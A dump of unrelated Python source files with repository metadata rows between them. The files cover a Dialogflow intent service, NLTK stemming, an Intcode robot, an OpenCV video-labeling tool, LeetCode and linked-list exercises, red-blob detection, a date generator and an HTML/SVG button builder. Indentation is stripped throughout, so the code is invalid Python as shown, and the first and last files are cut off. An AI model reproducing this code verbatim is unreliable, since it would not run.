from dialogflow_v2 import SessionsClient
from dialogflow_v2.proto.session_pb2 import (
DetectIntentResponse,
QueryInput,
QueryResult,
TextInput,
)
except:
SessionsClient = None
DetectIntentResponse = None
QueryInput = None
QueryResult = None
TextInput = None
from haps import SINGLETON_SCOPE, base, egg, scope
from haps.config import Config
from botkit.builtin_services.nlu.dialogflowconfig import DialogflowConfig
from botkit.builtin_services.nlu.messageunderstanding import MessageUnderstanding
@scope(SINGLETON_SCOPE)
@base
class INLUService(ABC):
@abstractmethod
def detect_intents(self, chat_id: int, message: str, language_code: str = None):
pass
@egg
class DialogflowService(INLUService):
config: DialogflowConfig = Config(DialogflowConfig.KEY)
def __init__(self):
self.session_client = SessionsClient.from_service_account_file(
self.config.json_credentials_file
)
def detect_intents(
self, chat_id: int, message: str, language_code: str = "en"
) -> MessageUnderstanding:
session = self.session_client.session_file(self.config.project_id, chat_id)
text_input = TextInput(text=message, language_code=language_code)
query_input = QueryInput(text=text_input)
response: DetectIntentResponse = self.session_client.detect_intent(
session=session, query_input=query_input
)
result: QueryResult = response.query_result
# Ignored result fields:
# - all_required_params_present
# - fulfillment_text
# - fulfillment_messages
# - webhook_source
# - webhook_payload
# - output_contexts
# - diagnostic_info
return MessageUnderstanding(
text=result.query_text,
language_code=result.language_code,
action=result.action,
intent=result.intent.display_name,
parameters=self._normalize_parameters(result.parameters),
contexts=result.output_contexts,
confidence=result.speech_recognition_confidence or result.intent_detection_confidence,
date=datetime.now(),
)
def _normalize_parameters(self, params: Dict):
result = {}
for k, v in params.items():
if "date" in k and v:
if hasattr(v, "keys") and "date_time" in v:
accessor = v["date_time"]
else:
accessor = v
print(accessor)
time_and_date: datetime = dateutil.parser.parse(accessor)
result[k] = time_and_date
continue
result[k] = v
return result
if __name__ == "__main__":
conf = DialogflowConfig(
project_id="userbot-9994a",
json_credentials_file="C:/projects/userbot/dialogflow-credentials.json",
)
c = DialogflowService(conf)
nlu = c.detect_intents(123, "!remind @tWiTfAcE to buy milk tomorrow at 6", "en")
# print(nlu)
pprint(nlu)
|
autogram/Botkit
|
botkit/builtin_services/nlu/nluservice.py
|
nluservice.py
|
py
| 3,231 |
python
|
en
|
code
| 10 |
github-code
|
6
|
30544609936
|
# stemming
# e.g. stemming will convert ["python","pythoner","pythoning","pythoned","pythonly"] to python
# e.g. stemming will convert ["interesting","interested"] to interest
# stemming may create some words that do not exits
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
ps = PorterStemmer()
example_words = ["python","pythoner","pythoning","pythoned","pythonly"]
for w in example_words:
print(ps.stem(w))
new_text = ("It is very import to be pythonly while you are pythoning with python. "
"All pythoners have have pythoned poorly at least once.")
words = word_tokenize(new_text)
for w in words:
print(ps.stem(w))
|
limingwu8/ML
|
NLP/demo03.py
|
demo03.py
|
py
| 669 |
python
|
en
|
code
| 1 |
github-code
|
6
|
71885865788
|
#! /usr/bin/env python
import sys
from collections import defaultdict
from intcode import IntCode
lines = []
for line in sys.stdin:
lines.append(line.rstrip('\n'))
class Robot():
program=None
direction=(0,1)
position=(0,0)
panels=None
def __init__(self, line) -> None:
self.program = IntCode(line.split(','), inputs=[])
self.panels = defaultdict(int)
def move(self, val):
dx,dy=self.direction
if val==1:
self.direction=dy,-dx
else: # val==0:
self.direction=-dy,dx
self.position = tuple(self.position[i]+self.direction[i] for i in (0,1,))
def run(self):
while not self.program.finished:
self.program.inputs.append(self.panels[self.position])
self.program.run()
if not self.program.finished:
color, new_dir = self.program.outputs
self.program.outputs.clear()
self.panels[self.position] = color
self.move(new_dir)
# Part 1
print("-- Part 1 --")
robot = Robot(lines[0])
robot.run()
dim = len(robot.panels.keys())
print(dim)
# Part 2
print("-- Part 2 --")
robot = Robot(lines[0])
robot.panels[0,0] = 1 # we start on a white panel instead
robot.run()
min_x, min_y, max_x, max_y = dim,dim,-dim,-dim
for (x,y) in robot.panels.keys():
min_x = min(x,min_x)
max_x = max(x,max_x)
min_y = min(y,min_y)
max_y = max(y,max_y)
for y in reversed(range(min_y, max_y+1)):
print(''.join( '@' if robot.panels[x,y]==1 else ' ' for x in range(min_x, max_x+1)))
|
albatros69/aoc-2019
|
day-11/paint.py
|
paint.py
|
py
| 1,580 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19167010026
|
#!/usr/bin/env python3
"""OpenCV-based frame viewer that replays recordings and assign time-based labels"""
import argparse
from pathlib import Path
import time
import cv2
import numpy as np
import derp.util
class Labeler:
"""OpenCV-based frame viewer that replays recordings and assign time-based labels"""
def __init__(self, folder, scale=1, bhh=40):
"""Load the topics and existing labels from the folder, scaling up the frame"""
self.folder = folder
self.scale = scale
self.bhh = bhh
self.config_changed = False
self.quality = None
self.config_path = self.folder / "config.yaml"
self.window_name = "Labeler %s" % self.folder
self.config = derp.util.load_config(self.config_path)
self.quality_colors = [(0, 0, 255), (0, 128, 255), (0, 255, 0)]
self.topics = derp.util.load_topics(folder)
self.frame_id = 0
self.n_frames = len(self.topics["camera"])
self.seek(self.frame_id)
self.f_h = self.frame.shape[0]
self.f_w = self.frame.shape[1]
self.l_h = int(self.bhh // 5)
self.window = np.zeros(
[self.f_h + self.bhh * 2 + self.l_h + 2, self.f_w, 3], dtype=np.uint8
)
self.paused = True
self.show = False
# Prepare labels
self.autonomous_bar = np.ones((self.f_w, 3), dtype=np.uint8) * (255, 255, 255)
self.quality_bar = np.ones((self.f_w, 3), dtype=np.uint8) * (128, 128, 128)
if "quality" in self.topics and len(self.topics["quality"]) >= self.n_frames:
self.qualities = [str(msg.quality) for msg in self.topics["quality"]]
else:
self.qualities = ["junk" for _ in range(self.n_frames)]
for i, quality in enumerate(self.qualities):
self.update_quality(i, i, quality)
# Prepare state messages
self.camera_times = [msg.publishNS for msg in self.topics["camera"]]
self.camera_autos = []
auto = False
for timestamp, topic, msg in derp.util.replay(self.topics):
if topic == 'controller':
auto = msg.isAutonomous
elif topic == 'camera':
self.camera_autos.append(auto)
actions = derp.util.extract_car_actions(self.topics)
self.camera_speeds = derp.util.extract_latest(self.camera_times,
actions[:, 0], actions[:, 1])
self.camera_steers = derp.util.extract_latest(self.camera_times,
actions[:, 0], actions[:, 2])
window_Xs = np.linspace(self.camera_times[0], self.camera_times[-1], self.f_w)
self.window_speeds = np.array(np.interp(window_Xs, self.camera_times, self.camera_speeds)
* -self.bhh, dtype=np.int)
self.window_steers = np.array(np.interp(window_Xs, self.camera_times, self.camera_steers)
* -self.bhh, dtype=np.int)
self.autonomous_bar *= np.array(np.interp(window_Xs, self.camera_times,
self.camera_autos), dtype=np.uint8)[:, None]
self.window_steers[self.window_steers > self.bhh] = self.bhh
self.window_steers[self.window_steers < -self.bhh] = -self.bhh
cv2.namedWindow(self.window_name)
cv2.setMouseCallback(self.window_name, self.click_handler)
# Print some statistics
duration = (self.camera_times[-1] - self.camera_times[0]) / 1e9
fps = (len(self.camera_times) - 1) / duration
print("Duration of %.0f seconds at %.0f fps" % (duration, fps))
def __del__(self):
"""Deconstructor to close window"""
cv2.destroyAllWindows()
def click_handler(self, event, x, y, flags, param):
""" Handle clicks on the window """
if event == cv2.EVENT_LBUTTONDOWN:
if y > self.f_h:
frame_id = int((x / self.f_w) * self.n_frames)
self.seek(frame_id)
self.show = True
def update_quality(self, first_index, last_index, quality=None):
"""Update the label bar to the given quality"""
if quality is None:
return False
first_index, last_index = min(first_index, last_index), max(first_index, last_index)
for index in range(first_index, last_index + 1):
self.qualities[index] = quality
beg_pos = self.frame_pos(first_index)
end_pos = self.frame_pos(last_index + (self.n_frames < len(self.quality_bar)))
self.quality_bar[beg_pos : end_pos + 1] = self.bar_color(quality)
return True
def seek(self, frame_id=None):
"""Update the current frame to the given frame_id, otherwise advances by 1 frame"""
if frame_id is None:
frame_id = self.frame_id + 1
if frame_id < 0:
frame_id = 0
self.paused = True
if frame_id >= self.n_frames:
frame_id = self.n_frames - 1
self.paused = True
self.update_quality(self.frame_id, frame_id, self.quality)
self.frame = cv2.resize(
derp.util.decode_jpg(self.topics["camera"][frame_id].jpg),
None,
fx=self.scale,
fy=self.scale,
interpolation=cv2.INTER_AREA,
)
self.frame_id = frame_id
return True
def bar_color(self, quality):
"""Figure out the color for the given quality"""
if quality is None:
return (128, 128, 128)
return self.quality_colors[derp.util.TOPICS["quality"].QualityEnum.__dict__[quality]]
def display(self):
"""Blit all the status on the screen"""
self.window[: self.frame.shape[0], :, :] = self.frame
horizon_percent = self.config["camera"]["pitch"] / self.config["camera"]["vfov"] + 0.5
# Horizon line
self.window[int(self.f_h * horizon_percent), :, :] = (255, 0, 255)
# Clear status buffer
self.window[self.f_h :, :, :] = 0
# Draw label bar
self.window[self.f_h : self.f_h + self.l_h // 2, :, :] = self.autonomous_bar
self.window[self.f_h + self.l_h // 2 : self.f_h + self.l_h, :, :] = self.quality_bar
# Draw current timestamp vertical line
current_x = self.frame_pos(self.frame_id)
self.window[self.f_h + self.l_h :, current_x, :] = self.bar_color(self.quality)
# Draw zero line
self.window[self.f_h + self.l_h + self.bhh, :, :] = (96, 96, 96)
offset = self.f_h + self.bhh + self.l_h
self.window[self.window_speeds + offset, np.arange(self.f_w), :] = (255, 64, 255)
self.window[self.window_steers + offset, np.arange(self.f_w), :] = (64, 255, 255)
text = "%05i %07.3f %06.3f %06.3f" % (self.frame_id,
(self.camera_times[self.frame_id] / 1E9) % 100,
self.camera_steers[self.frame_id],
self.camera_speeds[self.frame_id])
font = cv2.FONT_HERSHEY_SIMPLEX
pink = (255, 128, 255)
offset = (0, int(self.scale * 30))
cv2.putText(self.window, text, offset, font, self.scale, pink, 1, cv2.LINE_AA)
cv2.imshow(self.window_name, self.window)
def save_labels(self):
"""Write all of our labels to the folder as messages"""
with derp.util.topic_file_writer(self.folder, "quality") as quality_fd:
for quality_i, quality in enumerate(self.qualities):
msg = derp.util.TOPICS["quality"].new_message(
createNS=derp.util.get_timestamp(),
publishNS=self.topics["camera"][quality_i].publishNS - 1,
writeNS=derp.util.get_timestamp(),
quality=quality,
)
msg.write(quality_fd)
print("Saved quality labels in", self.folder)
if self.config_changed:
derp.util.dump_config(self.config, self.config_path)
print("Saved changes to config")
def handle_keyboard_input(self):
"""Fetch a new keyboard input if one exists"""
key = cv2.waitKey(1) & 0xFF
if key == 255:
return True
if key == 27:
return False # ESC
if key == ord(" "):
self.paused = not self.paused
elif key == ord("g"):
self.quality = "good"
elif key == ord("r"):
self.quality = "risk"
elif key == ord("t"):
self.quality = "junk"
elif key == ord("c"):
self.quality = None
elif key == ord("s"):
self.save_labels()
elif key == 82:
self.seek(self.frame_id + 10) # up
elif key == 84:
self.seek(self.frame_id - 10) # down
elif key == 81:
self.seek(self.frame_id - 1) # left
elif key == 83:
self.seek(self.frame_id + 1) # right
elif key == 85:
self.config["camera"]["pitch"] -= 0.1 # page up
self.config_changed = True
elif key == 86:
self.config["camera"]["pitch"] += 0.1 # page down
self.config_changed = True
elif ord("1") <= key <= ord("5"):
self.seek(int(self.n_frames * (key - ord("0") - 1) / 4))
elif key != 255:
print("Unknown key press: [%s]" % key)
self.show = True
return True
def frame_pos(self, frame_id):
"""Position of current camera frame on the horizontal status bars"""
return min(self.f_w - 1, int(frame_id / self.n_frames * self.f_w))
def run(self):
"""Run the labeling program in a forever loop until the user quits"""
self.display()
while True:
if not self.paused:
self.show = self.seek()
if self.show:
self.display()
self.show = False
if not self.handle_keyboard_input():
break
time.sleep(0.01)
def main():
"""Initialize the labeler based on user args and run it"""
print(
"""
This labeling tool interpolates the data based on camera frames and then lets you label each.
To exit press ESCAPE
To save press s
To navigate between frames:
Left/Right: move in 1 frame increments
Up/Down: move in 10 frame increments
1: goes to beginning
2: goes to 25% in
3: goes to 50% in
4 goes to 25% in
5: goes to end
To adjust horizon line press PAGE_UP or PAGE_DOWN
To change the quality label of this frame
g: good (use for training)
r: risk (advanced situation not suitable for classic training)
t: junk (don't use this part of the video, aka trash)
c: clear, as in don't change the quality label
"""
)
parser = argparse.ArgumentParser()
parser.add_argument("paths", type=Path, nargs="*", metavar="N", help="recording path location")
parser.add_argument("--scale", type=float, default=1.0, help="frame rescale ratio")
args = parser.parse_args()
if not args.paths:
recordings = (derp.util.DERP_ROOT / "recordings").glob("recording-*")
args.paths = [r for r in recordings if not (r / "quality.bin").exists()]
for path in args.paths:
print("Labeling", path)
labeler = Labeler(folder=path, scale=args.scale)
labeler.run()
if __name__ == "__main__":
main()
|
notkarol/derplearning
|
bin/label.py
|
label.py
|
py
| 11,483 |
python
|
en
|
code
| 40 |
github-code
|
6
|
6131848495
|
import numpy as np
from PIL import Image
radar = np.load('./origin_data/radars_2020-11-01_2022-12-31.npy')
color_image = Image.open('./cool_data/mask.png')
mask = np.array(color_image.convert('L'))
for i in range(825):
for j in range(200):
if mask[i, j] > 200:
mask[i, j] = 0
else:
mask[i, j] = 1
index = 0
ice = np.array(radar)
for index in range(radar.shape[0]):
for i in range(825):
for j in range(200):
if radar[index, i, j] > 0.53:
ice[index, i, j] = 1
else:
ice[index, i, j] = 0
ice[index] = ice[index]*mask
print(index)
np.save('./cool_data/ice_mask.npy',ice)
|
Ronningen/DDIN1
|
ice_mask_generation.py
|
ice_mask_generation.py
|
py
| 720 |
python
|
en
|
code
| 1 |
github-code
|
6
|
40071013592
|
class Solution:
def findNthDigit(self, n):
"""
:type n: int
:rtype: int
"""
if n <= 9 :
return n
digit = 1
count = 9
while n > digit*count:
n -= digit*count
digit+=1
count*=10
start = 10**(digit-1)
num = n//digit + start
ind = n%digit
if ind == 0:
r = (num-1)%10
return r
else :
r = (num//(10**(digit-ind)))%10
return r
def main():
solution = Solution()
a = 10
print ('Output:', solution.findNthDigit(a))
if __name__ == '__main__':
main()
# start*=10
# start+=(n-1)/digit
|
lucy9215/leetcode-python
|
400_NthDigit.py
|
400_NthDigit.py
|
py
| 734 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73510522747
|
class Node:
def __init__(self,val):
self.val = val
self.next = None
class MyLinkedList:
def __init__(self):
self.dummy = Node(-1)
def get(self, index: int) -> int:
count = 0
current = self.dummy.next
while current and count != index:
current = current.next
count += 1
if not current:
return -1
return current.val
def addAtHead(self, val: int) -> None:
node = Node(val)
node.next = self.dummy.next
self.dummy.next = node
def addAtTail(self, val: int) -> None:
node = Node(val)
current = self.dummy
while current.next != None:
current = current.next
current.next = node
def addAtIndex(self, index: int, val: int) -> None:
node = Node(val)
current = self.dummy
count = 0
while current and count != index:
current = current.next
count += 1
if current:
node.next = current.next
current.next = node
def deleteAtIndex(self, index: int) -> None:
current = self.dummy
count = 0
while current and count != index:
current = current.next
count += 1
if current and current.next:
current.next = current.next.next
# Your MyLinkedList object will be instantiated and called as such:
# obj = MyLinkedList()
# param_1 = obj.get(index)
# obj.addAtHead(val)
# obj.addAtTail(val)
# obj.addAtIndex(index,val)
# obj.deleteAtIndex(index)
|
yonaSisay/a2sv-competitive-programming
|
0707-design-linked-list/0707-design-linked-list.py
|
0707-design-linked-list.py
|
py
| 1,616 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7261113141
|
import matplotlib
matplotlib.use('TkAgg')
import cv2
import numpy as np
import time
from matplotlib import pyplot as plt
def main():
#img= cv2.imread('primeiroFrame.jpg',0)
img= cv2.imread('primeiroFrame.jpg',cv2.IMREAD_COLOR)
print(img.shape)
#nomaliza a imagem
img = histogramaNormalizadoColor(img)
#aplica filtro gausiano
img = cv2.GaussianBlur(img,(5,5),0)
#calcula os clauster usando kmeans:
img = calculakmeans(img)
#aplica trashholding separando as cores vermelhas
mask = trashholdingVermelho(img)
#aplica uma operação de closing e open na mascara para remover os ruidos
retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(50,1))
openImage = cv2.morphologyEx(mask,cv2.MORPH_CLOSE,retKernel)
retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(20,10))
closeImage = cv2.morphologyEx(openImage,cv2.MORPH_OPEN,retKernel)
retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(5,5))
openImage = cv2.morphologyEx(closeImage,cv2.MORPH_CLOSE,retKernel)
#encontra os blobs:
#img_blob = deteccaoDeBlobs(openImage)
#utilizando momento:
img_blob = detectMomento(openImage)
#cv2.imshow("Final",openImage)
#cv2.imshow("CloseiImage",closeImage)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
#cap.release()
def detectMomento(img):
#img= cv2.imread('untitled.png',0)
ret,thresh = cv2.threshold(img,125,255,0)
countourn, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
countourn = list(reversed(countourn))
cnt = countourn[0]
M = cv2.moments(cnt)
cx = int(M["m10"]/M["m00"])
cy = int(M["m01"]/M["m00"])
print(cx)
print(cy)
x,y,w,h = cv2.boundingRect(countourn[0])
cv2.rectangle(img,(x-10,y-10), (x+w+10,y+h+10),(255,255,255),1)
cv2.imshow("img_contours", img)
cv2.waitKey(0)
""" for c in countourn:
M = cv2.moments(c)
cx = int(M["m10"]/M["m00"])
cy = int(M["m01"]/M["m00"])
cv2.circle(img, (cX, cY), 5, (255, 255, 255), -1)
cv2.imshow("img_contourn", img)
print(countourn)
cv2.drawContours(img, countourn, -1, (0,255,0), 3)
cv2.imshow("img_contours", img)
cv2.waitKey(0) """
def deteccaoDeBlobs(img):
#img= cv2.imread('untitled.png',cv2.IMREAD_GRAYSCALE)
params = cv2.SimpleBlobDetector_Params()
#img = cv2.bitwise_not(img)
params.minDistBetweenBlobs = 10
params.filterByColor = True
params.blobColor = 255
params.filterByCircularity = False
params.filterByConvexity = False
params.filterByInertia = False
params.filterByArea = True #
params.minArea = 1 #
params.maxArea = 100000 #
# Create a detector with the parameters
ver = (cv2.__version__).split('.')
if int(ver[0]) < 3 :
detector = cv2.SimpleBlobDetector(params)
else :
detector = cv2.SimpleBlobDetector_create(params)
keypoints = detector.detect(img)
print(type(keypoints))
keypoints = list(reversed(keypoints))
#np.invert(keypoints)
for i in keypoints:
im_with_keypoints = cv2.drawKeypoints(img, [i], np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
print("################")
print(i.class_id)
print(i.pt)
objectCentroid = i.pt
print("################")
break
black = np.zeros((540,960,3))
#print(im_with_keypoints.size)
#im_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
cv2.imshow("Keypoints", im_with_keypoints)
cv2.waitKey(0)
def trashholdingVermelho(colorImage):
#converte para HSV
hsv = cv2.cvtColor(colorImage, cv2.COLOR_BGR2HSV)
lower_red = np.array([0,70,50])
upper_red = np.array([10,255,255])
mask1 = cv2.inRange(hsv,lower_red,upper_red)
lower_red = np.array([170,70,50])
upper_red = np.array([180,255,255])
mask2 = cv2.inRange(hsv,lower_red,upper_red)
mask = mask1 | mask2
res = cv2.bitwise_and(colorImage,colorImage, mask = mask)
#cv2.imshow('frame',colorImage)
#cv2.imshow('mask',mask)
#cv2.imshow('res',res)
return mask
def calculaHistogramaColor(colorImage):
color = ('b','g','r')
for i,col in enumerate(color):
print("passei")
histr = cv2.calcHist(colorImage,[i],None,[255],[0,255])
plt.plot(histr,color = col)
plt.xlim([0,255])
plt.show()
def calculaHistograma(greyImage):
histr = cv2.calcHist(greyImage,[0],None,[255],[0,256])
plt.plot(histr,)
plt.xlim([0,255])
def histogramaNormalizadoColor(ColorImg):
lab = cv2.cvtColor(ColorImg, cv2.COLOR_BGR2LAB)
lab_planes = cv2.split(lab)
clahe = cv2.createCLAHE(clipLimit=2.0,tileGridSize=(8,8))
lab_planes[0] = clahe.apply(lab_planes[0])
lab = cv2.merge(lab_planes)
bgr = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
return bgr
#Contrast Limited Adaptive Histogram Equalization
# create a CLAHE object (Arguments are optional).
def histogramaNormalizadoCinza(img):
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
cl1 = clahe.apply(image)
return cl1
def calculakmeans(img):
z = img.reshape((-1,3))
z = np.float32(z)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K=15
ret, label,center = cv2.kmeans(z,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)
center = np.uint8(center)
res = center[label.flatten()]
res2= res.reshape((img.shape))
return res2
if __name__ == "__main__":
main()
|
felipemateus/vis-oCompEstudo
|
histogram.py
|
histogram.py
|
py
| 5,685 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37958731395
|
import sys
from datetime import datetime
class DateGenerator:
def __init__(self, starting, ending, display, separator):
self.__year_range = range(int(starting), int(ending))
self.__display = display
self.__separator = separator
self.__display_array = {
'0': self.ymd,
'1': self.dmy,
'2': self.mdy
}
self.generate_date()
def generate_date(self):
m = range(1, 13)
d = range(1, 32)
for year in self.__year_range:
for month in m:
for day in d:
self.__display_array[self.__display](year, month, day)
def ymd(self, year, month, day):
print(str(year) + self.__separator + "{:02d}".format(month) + self.__separator + "{:02d}".format(day))
def dmy(self, year, month, day):
print(str(day) + str(month) + str(year))
def mdy(self, year, month, day):
print("{:02d}".format(month) + self.__separator + "{:02d}".format(day) + self.__separator + str(year))
def main():
if len(sys.argv) == 4:
DateGenerator(sys.argv[1], sys.argv[2], sys.argv[3], "")
elif len(sys.argv) == 5:
DateGenerator(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
else:
print(
"args:\n\t1: starting year\n\t2: ending year\n\t3: display format\n\t\t0 = yyyymmdd\n\t\t1 = ddmmyyyy\n\t\t2 = mmddyyyy\n\t3: optional separator added in between")
if __name__ == '__main__':
main()
|
vjgiri/date
|
dateext.py
|
dateext.py
|
py
| 1,356 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24535937994
|
# html
def create_html(header, body):
html = '<!DOCTYPE html>'
html += '<html><head>' + header + '</head>'
html += '<body>' + body + '</body>'
html += '</html>'
return html
# link
def add_ttf_font(location, name):
html = '<style>'
html += '@font-face {'
html += 'font-family:' + name + ';'
html += 'src: url(' + location + ') format(\'truetype\');'
html += '}'
html += '</style>'
return html
def add_css(location):
return '<link rel="stylesheet" type="text/css" href="' + location + '"/>'
def add_js(location):
return '<script type="text/javascript" src="' + location + '"></script>'
# svg stuff
def add_title(title):
return "<title>" + title + "</title>"
def add_style(style_dict):
style = 'style="'
for k, v in style_dict.items():
style += str(k) + ':' + str(v) + '; '
style += '"'
return style
def create_circle(radius, cx, cy, color):
html = '<circle r="' + str(radius) + '" '
html += 'cx="' + str(cx) + '" '
html += 'cy="' + str(cy) + '" '
html += 'fill="' + str(color) +'" '
html += '/>'
return html
def create_polygon(points_list, color):
html = '<polygon '
html += 'points = "'
for point in points_list:
html += str(point[0]) + "," + str(point[1]) + " "
html += '" '
html += 'fill="' + str(color) + '" '
html += '/>'
return html
def create_smash_svg_text(word, offset_x, offset_y, size, text_length, color):
# add the back layer, this provides the basis for the white stroke background
html = '<text '
html += 'text-anchor="start" '
html += 'x="' + str(offset_x + 1) + '" '
html += 'y="' + str(offset_y) + '" '
html += 'textLength="' + str(text_length) + 'px" '
html += 'fill="' + color + '" '
html += 'font-family="Edo, Helvetica, Arial" '
html += 'font-weight="700" '
html += 'font-size="' + str(size) + 'px" '
html += 'stroke="#ffffff" '
html += 'stroke-width="5" '
html += 'stroke-linecap="round"'
html += '>'
html += word
html += '</text>'
# add the forground, this provides the actual text in the correct color
html += '<text '
html += 'text-anchor="start" '
html += 'x="' + str(offset_x) + '" '
html += 'y="' + str(offset_y) + '" '
html += 'textLength="' + str(text_length) + 'px" '
html += 'fill="' + color + '" '
html += 'font-family="Edo, Helvetica, Arial" '
html += 'font-weight="700" '
html += 'font-size="' + str(size) + 'px" '
html += '>'
html += word
html += '</text>'
return html
def create_smash_button(size_x, size_y, color, background_color = 'rgb(50, 50, 50)', word = None, float_val = None, button_type="standard", onclick=None, new_window=None, offset_up= 0, highlighted=False):
outline_color = background_color
shadow_color = background_color
# for emphasis the shadow or outline is changed to the main color
#if highlighted:
# shadow_color = color
if highlighted:
outline_color = color
html = '<svg style="'
if float_val:
html += 'float: ' + float_val + ';'
html += 'width: ' + str(size_x + 5) + 'px;'
html += 'height: ' + str(size_y + 5) + 'px;'
if onclick:
html += '"><g onclick="window.location.href= \'' + onclick + '\'">'
elif new_window:
html += '"><g onclick="window.open(\'' + new_window + '\')">'
else:
html += '">'
# draw button
if button_type == "standard":
# add shadow
html += create_circle(size_y / 2, size_y / 2 + 5, size_y / 2 + 5, shadow_color)
html += create_polygon([(size_y/2.0 + 5,0 + 5),(size_y/2.0 + 5,size_y + 5),(size_x * 3.0/4 + 5, size_y + 5),(size_x + 5, 0 + 5)], shadow_color)
# add outline
html += create_circle(size_y / 2, size_y / 2, size_y / 2, outline_color)
html += create_polygon([(size_y/2.0,0),(size_y/2.0,size_y),(size_x * 3.0/4, size_y),(size_x, 0)], outline_color)
# add background with color
html += create_circle(size_y / 2 - 5, size_y / 2, size_y / 2, color)
html += create_polygon([(size_y/2.0,5),(size_y/2.0,size_y-5),(size_x * 3.0/4 - 2, size_y-5),(size_x - 12, 5)], color)
# draw reverse button
elif button_type == "reverse":
html += create_circle(size_y / 2, size_x - (size_y / 2) + 5, size_y / 2 + 5, shadow_color)
html += create_polygon([(0 + 5, size_y + 5), (size_x / 4 + 5, 0 + 5), (size_x - (size_y / 2) + 5, 0 + 5), (size_x - (size_y / 2) + 5, size_y + 5)], shadow_color)
html += create_circle(size_y / 2, size_x - (size_y / 2), size_y / 2, outline_color)
html += create_polygon([(0, size_y), (size_x / 4, 0), (size_x - (size_y / 2), 0), (size_x - (size_y / 2), size_y)], outline_color)
html += create_circle(size_y / 2 - 5, size_x - (size_y / 2), size_y / 2, color)
html += create_polygon([(12, size_y - 5), (size_x / 4 + 2, 5), (size_x - (size_y / 2) - 5, 5), (size_x - (size_y / 2) - 5, size_y - 5)], color)
# draw middle type button
elif button_type == "middle":
html += create_polygon([(0 + 5, size_y + 5), (size_x / 4 + 5, 0 + 5), (size_x + 5, 0 + 5), (size_x * 3.0 / 4 + 5, size_y + 5)], shadow_color)
html += create_polygon([(0, size_y), (size_x / 4, 0), (size_x, 0), (size_x * 3.0 / 4, size_y)], outline_color)
html += create_polygon([(0 + 12, size_y - 5), (size_x / 4 + 2, 0 + 5), (size_x - 12, 0 + 5), (size_x * 3.0 / 4 - 2, size_y - 5)], color)
# draw large buttons with special values
elif button_type == "full":
html += create_circle(size_y / 2, size_y / 2 + 5, size_y / 2 + 5, shadow_color)
html += create_polygon([(size_y/2.0 + 5, 0 + 5),(size_y/2.0 + 5,size_y + 5),(size_x - size_y + 5, size_y + 5),(size_x + 5, 0 + 5)], shadow_color)
html += create_circle(size_y / 2, size_y / 2, size_y / 2, outline_color)
html += create_polygon([(size_y/2.0,0),(size_y/2.0,size_y),(size_x - size_y, size_y),(size_x, 0)], outline_color)
html += create_circle(size_y / 2 - 5, size_y / 2, size_y / 2, color)
html += create_polygon([(size_y/2.0,5),(size_y/2.0,size_y-5),(size_x - size_y - 2, size_y-5),(size_x - 12, 5)], color)
# add words on the front
if word:
if button_type == "standard":
html += create_smash_svg_text(word, (size_y / 2) - 7, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color)
elif button_type == "reverse":
html += create_smash_svg_text(word, size_x / 4 - 7, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color)
elif button_type == "middle":
html += create_smash_svg_text(word, size_x / 4 - 18, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color)
elif button_type == "full":
html += create_smash_svg_text(word, (size_y / 2) - 7, size_y - 10 - offset_up, size_y, size_x - size_y - 20, background_color)
# add the button ability
if onclick:
html += "</g>"
html += "</svg>"
return html
def generate_navbar(active=None, logged_in=False):
style_dict = {
'position': 'relative',
'top': 0,
'left': 0,
'margin-top': '10px',
'margin-bottom': '10px',
'margin-right': 'auto',
'margin-left': 'auto',
'min-width':'1000px',
'max-width': '1000px',
'height': '55px',
}
# define the highlighting for the buttons
smash_highlighted = active == "home" or active == "splash"
login_highlighted = active == "login"
logout_highlighted = active == "logout"
register_highlighted = active == "register"
profile_highlighted = active == "profile"
unranked_highlighted = active == "unranked"
ranked_highlighted = active == "ranked"
# add the navbar div
html = '<div '
html += add_style(style_dict)
html += '>'
# add the main button
html += create_smash_button(195, 50, 'rgb(255, 50, 10)', word = 'Smash', float_val='left', onclick='/', highlighted=smash_highlighted)
# add the login specific buttons
if not logged_in:
html += create_smash_button(195, 50, 'rgb(10, 150, 50)', word = 'Register', float_val='right', button_type="reverse", onclick='/register', highlighted=register_highlighted)
html += create_smash_button(195, 50, 'rgb(10, 50, 250)', word = 'Login', float_val='right', onclick='/login', highlighted=login_highlighted)
else:
html += create_smash_button(195, 50, '#666688', word = 'Logout', float_val='right', button_type="reverse", onclick='/logout', highlighted=logout_highlighted)
html += create_smash_button(195, 50, '#93D620', word = 'Ranked', float_val='right', button_type="middle", onclick='/ranked', highlighted=ranked_highlighted)
html += create_smash_button(195, 50, '#169FFA', word = 'Unranked', float_val='right', button_type="middle", onclick='/unranked', highlighted=unranked_highlighted)
html += create_smash_button(195, 50, '#F2A705', word = 'Profile', float_val='right', button_type="middle", onclick='/profile', highlighted=profile_highlighted)
html += '</div>'
return html
def generate_main_div(inner):
style_dict = {
'top': 0,
'left': 0,
'position': 'relative',
'margin-top': '10px',
'margin-bottom': '10px',
'margin-left': 'auto',
'margin-right': 'auto',
'min-width':'1000px',
'max-width': '1000px',
}
html = '<div id="main_div"'
html += add_style(style_dict)
html += '>'
style_dict = {
'font-family': 'Helvetica, Arial',
'font-weight':'500',
'font-size':'32px',
'top': 0,
